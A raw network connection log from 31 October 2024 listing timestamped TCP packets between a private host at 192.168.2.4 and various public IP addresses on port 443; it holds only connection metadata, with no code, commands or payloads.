Oct 31, 2024 19:19:29.652740955 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.663096905 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:29.663152933 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.663580894 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:29.663641930 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.671010971 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:29.671082020 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.671205997 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:29.790501118 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:29.790568113 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.791062117 CET	49812	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:29.791080952 CET	443	49812	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:30.359700918 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.359774113 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:30.359875917 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.361561060 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.361660004 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:30.361745119 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.362941027 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.362977982 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:30.364054918 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:30.364089012 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:31.065663099 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:31.065721989 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:31.066090107 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:31.066318989 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:31.066337109 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:31.785084963 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785109997 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:31.785180092 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785396099 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785409927 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:31.785598993 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785619974 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:31.785634041 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785784960 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:31.785797119 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.152586937 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.152626991 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.152733088 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.153223991 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.153240919 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.499417067 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.499772072 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.499789953 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.500164986 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.500452995 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.500514030 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.500765085 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.509051085 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.509299994 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.509322882 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.509707928 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.509766102 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.510417938 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.510471106 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.511102915 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.511178017 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.511368036 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.511384964 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.531789064 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.532283068 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.532310009 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.532675982 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.533879995 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.533947945 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.534216881 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.543329000 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.575330019 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.631966114 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.647563934 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.659667969 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.730782032 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.730813026 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.731730938 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.731739044 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.731894016 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.731904984 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.731939077 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.732841969 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.732853889 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.732902050 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.735131979 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.735234976 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.736541986 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.736603975 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.738956928 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.738971949 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.739423037 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.739429951 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.768656015 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.779742956 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.779843092 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.806061983 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:32.806113958 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:32.806282997 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:32.822906017 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.822961092 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.823075056 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.823092937 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.823133945 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.823185921 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.823193073 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.823993921 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.831918001 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.835971117 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.840996981 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.841082096 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.841227055 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.841272116 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.847549915 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.847551107 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.847573996 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.851767063 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:32.893567085 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.893631935 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.903873920 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.903956890 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.904083014 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.946434021 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.957227945 CET	49815	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.957268953 CET	443	49815	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.960447073 CET	49816	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.960465908 CET	443	49816	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.964171886 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:32.964207888 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:32.964555979 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.964595079 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.964869022 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.965195894 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:32.965219021 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:32.975423098 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.975493908 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.975687981 CET	49818	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:32.975699902 CET	443	49818	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:32.993218899 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:32.994153976 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.013200045 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.022224903 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.022245884 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.022994995 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.029865026 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.029949903 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.030024052 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.032602072 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.032650948 CET	443	49833	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.032710075 CET	49833	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.035607100 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.035686016 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.035836935 CET	443	49832	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.035861969 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.035892010 CET	49832	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.075330973 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.091751099 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.091787100 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.091892958 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.101301908 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:33.101339102 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:33.177856922 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.177870989 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.177962065 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.178735971 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.178777933 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.179120064 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.194308996 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.194323063 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.197670937 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.197714090 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.226116896 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.226139069 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.226200104 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.230381012 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.231780052 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:33.231864929 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:33.232007980 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:33.232331038 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.232342005 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.232897997 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:33.232918978 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:33.233088017 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:33.233608961 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.233663082 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.233738899 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.234541893 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:33.234575987 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:33.234730005 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:33.235944986 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.235971928 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:33.236059904 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.237075090 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:33.237086058 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:33.237142086 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:33.237644911 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:33.237672091 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:33.237853050 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:33.237894058 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:33.237896919 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:33.238240957 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:33.238253117 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:33.239459038 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.239480972 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.239891052 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:33.239908934 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:33.240998030 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.241019011 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:33.241355896 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:33.241369963 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:33.241585970 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:33.241615057 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:33.309357882 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.309425116 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.309449911 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.309474945 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.309518099 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.309946060 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.309995890 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.317754030 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.317970991 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.326478958 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.326523066 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.326670885 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.326694012 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.326818943 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.354006052 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.354052067 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:33.354106903 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.355698109 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:33.355714083 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:33.360987902 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:33.361028910 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:33.361099005 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:33.361330032 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:33.361342907 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:33.361392975 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:33.361506939 CET	49868	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:33.361519098 CET	443	49868	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:33.361680984 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:33.361691952 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:33.365554094 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:33.365572929 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:33.365808964 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:33.366070986 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:33.366091013 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:33.428061962 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.428092003 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.428111076 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.428129911 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.428179026 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.428303957 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.428400040 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.429440975 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.429487944 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.429536104 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.429552078 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.429596901 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.433537960 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.433638096 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.442254066 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.442370892 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.442420959 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.442459106 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.451107025 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.451159954 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.460011005 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.468791008 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.468817949 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.468859911 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.468863964 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.468873978 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.468914032 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.477860928 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.477958918 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.477972984 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.536354065 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.536376953 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547168016 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547194958 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547234058 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.547249079 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547307968 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.547349930 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547413111 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547564030 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.547574997 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.547954082 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.548086882 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.548098087 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.548505068 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.548572063 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.548582077 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.549673080 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.549712896 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.549750090 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.549765110 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.549879074 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.550776958 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.553040028 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.553071022 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.553082943 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.553102970 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.553222895 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.558315039 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.561342001 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.561407089 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.561422110 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.564446926 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.564497948 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.564512968 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.570024967 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.570086956 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.570101023 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.574385881 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.574429035 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.574459076 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.580279112 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.580321074 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.580333948 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.584948063 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.585009098 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.585021973 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.590612888 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.590676069 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.590688944 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.595654964 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.595702887 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.595717907 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.601416111 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.601787090 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.601803064 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.606344938 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.606426954 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.606440067 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.649471998 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.649504900 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.649548054 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.649563074 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.649626970 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.666213989 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666275024 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666364908 CET	49835	443	192.168.2.4	142.250.185.142
